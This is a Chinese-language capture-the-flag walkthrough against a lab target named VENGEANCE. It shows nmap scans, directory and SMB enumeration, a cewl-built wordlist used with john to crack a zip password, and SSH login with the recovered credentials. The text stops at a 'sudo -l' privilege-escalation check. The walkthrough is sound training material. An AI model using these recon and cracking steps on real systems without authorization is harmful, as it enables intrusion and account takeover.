1,將兩臺虛擬機網絡連接都改為NAT模式
2,攻擊機上做namp局域網掃描發現靶機
nmap -sn 192.168.23.0/24
那么攻擊機IP為192.168.23.182,靶場IP192.168.23.3
3,對靶機進行端口服務探測
nmap -sV -T4 -p- -A 192.168.23.3
端口號 | 協議 | 狀態 | 服務名稱 | 版本/詳細信息 |
80 | tcp | open | http | nginx 1.18.0 (Ubuntu) 網站標題:VENGEANCE 運行用戶:www-data |
443 | tcp | open | ssl/http | nginx 1.18.0 (Ubuntu) SSL 證書有效期:2021-02-14 至 2022-02-14 支持協議:h2/http1.1 |
139 | tcp | open | netbios-ssn | Samba smbd 4.6.2 運行用戶:root |
445 | tcp | open | netbios-ssn | Samba smbd 4.6.2 運行用戶:root |
113 | tcp | open | ident? | 身份驗證服務(可能) 運行用戶:root |
143 | tcp | open | imap? | 郵件訪問協議(可能) |
993 | tcp | open | imaps? | 加密的IMAP協議(可能) |
995 | tcp | open | pop3s? | 加密的POP3協議(可能) |
22222 | tcp | open | ssh | OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 支持密鑰類型:RSA/ECDSA/ED25519 |
4,起手先訪問一下80端口存在的http服務,直接使用IP訪問緩慢,需要修改host文件添加一條域名解析
echo "192.168.23.3 vengeance.goodtech.inc" >>/etc/hosts
http://vengeance.goodtech.inc/
然后就是掃描一下目錄:
dirsearch -u http://vengeance.goodtech.inc -x 404,403
5,用?enum4linux掃描一下:
enum4linux 192.168.23.3
smbclient -N \\\\192.168.23.3\\sarapublic$
gio.zip打開需要密碼
密碼應該隱藏在上面下載的那幾個文件里,先把那幾個文件做成密碼本,使用cewl字典生成工具生成密碼本,先在本地開啟個 http 服務,然后利用cewl爬取文件關鍵字生成密碼本:
cewl 192.168.23.3:8000/blurb.txt >> pass.txt
cewl 192.168.23.3:8000/eaurouge >> pass.txt
cewl 192.168.23.3:8000/eaurouge.txt >> pass.txt
cewl 192.168.23.3:8000/essay.txt >> pass.txt
cewl 192.168.23.3:8000/profile.txt >> pass.txt
cewl 192.168.23.3:8000/to-do >> pass.txt
利用生成的密碼本爆破一下 zip 文件:
john --wordlist=pass.txt password.txt
nanotechnological
6,使用獲得賬戶和密碼信息:qinyi/giovanni_130R_Suzuka,進行ssh登錄,成功獲得shell權限
ssh qinyi@192.168.23.3 -p 22222
信息收集一下
看一下如何sudo提權 sudo -l